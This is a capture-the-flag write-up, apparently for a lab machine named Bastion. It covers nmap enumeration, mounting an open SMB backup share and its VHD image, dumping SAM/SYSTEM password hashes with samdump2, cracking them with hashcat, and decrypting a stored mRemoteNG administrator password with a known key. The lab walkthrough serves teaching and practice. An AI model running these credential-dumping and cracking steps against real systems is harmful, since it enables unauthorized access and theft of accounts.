Jump Ahead: Enum – User – Root – Resources
TL;DR;
To solve this machine, we enumerate services using nmap. Enumerating SMB shares, we see there is a Backups share that we are able to mount to our local machine. On the share, there are 2 virtual hard drives. Mounting the larger one, we are able to retrieve the SYSTEM and SAM hives. With these, we are able to recover accounts and password hashes. After cracking the password of the L4mpje user, we are able to SSH into the machine and obtain user.txt. Looking at installed programs, we see mRemoteNG is installed. We are able to exploit a vulnerability in the encryption mechanism using a known key value to decrypt the administrator password. Using the password, we are able to a SSH into the machine as administrator and get root.txt.
Enumeration
Like all machines, we begin by enumerating all open ports using nmap, then ran nmap scripts against them:
nmap -p- --min-rate 4000 10.10.10.134
nmap -A -oA scans/nmap-tcp -p 22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.069s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -51m26s, deviation: 1h09m14s, median: -11m28s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-06-21T23:51:28+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-06-21 16:51:25
|_ start_date: 2019-06-21 16:02:38
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 66.59 ms 10.10.14.1
2 66.68 ms 10.10.10.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 21 17:03:02 2019 -- 1 IP address (1 host up) scanned in 90.07 seconds
From our scan results, we see that ports 5985 and 47001 are hosting web servers, so we tried enumerating them with nikto and gobuster, however, we were unsuccessful. Next, we saw SMB was running on port 445, so we attempt to list all shares.
smbclient -L ////10.10.10.134//
List all exported SMB shares
Getting User
Seeing there is a Backups share, we mount it to our system, so we can look through it
mount //10.10.10.134/Backups SMBShare/
Once the share is mounted, we can run tree to get a hierarchical look at the files in this share:
Files in the Backups share
We see two virtual hard disks (.vhd extension), so we mount the larger disk (as it is more likely to have usable information).
qemu-nbd --read-only -c /dev/nbd0 'SMBShare/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd'
mount /dev/nbd0p1 HDD/
Mounting the virtual hard drive
Since this mounted disk appears to be a Windows hard drive, we should be able to retrieve the SAM and SYSTEM hives to recover account names and hashes using samdump2.
find HDD/Windows/ -name *SYSTEM* & find HDD/Windows/ -name *SAM*
samdump2 SYSTEM SAM
Dumping account password hashes
Taking the NTLM hash for L4mpje and using hashcat to crack it using the rockyou.txt wordlist, we are able to recover the user’s password. Using these credentials, we are able to ssh into the machine as l4mpje, and retrieve user.txt.
Logged in via SSH 
Was able to get user.txt
Getting Root
Doing initial recon on the machine, we see there is a program named mRemoteNG. Researching this application, we see there is a vulnerability in the encryption key being a known value. To exploit this vulnerability we will need to get the encrypted password for the Administrator user in C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml.
Installed programs on the machine
Supplying the encrypted password to a decryption script we found on github, we are able to recover the password for Administrator, and SSH into the machine. Doing so allows us to get root.txt.
Retrieving the password for Administrator 
Logging into the machine as Administrator and retrieving root.txt
Thank you for taking the time to read my write-up. I am interested in other ways this machine has been solved. Feel free to reach out to me and we can discuss it. Thanks!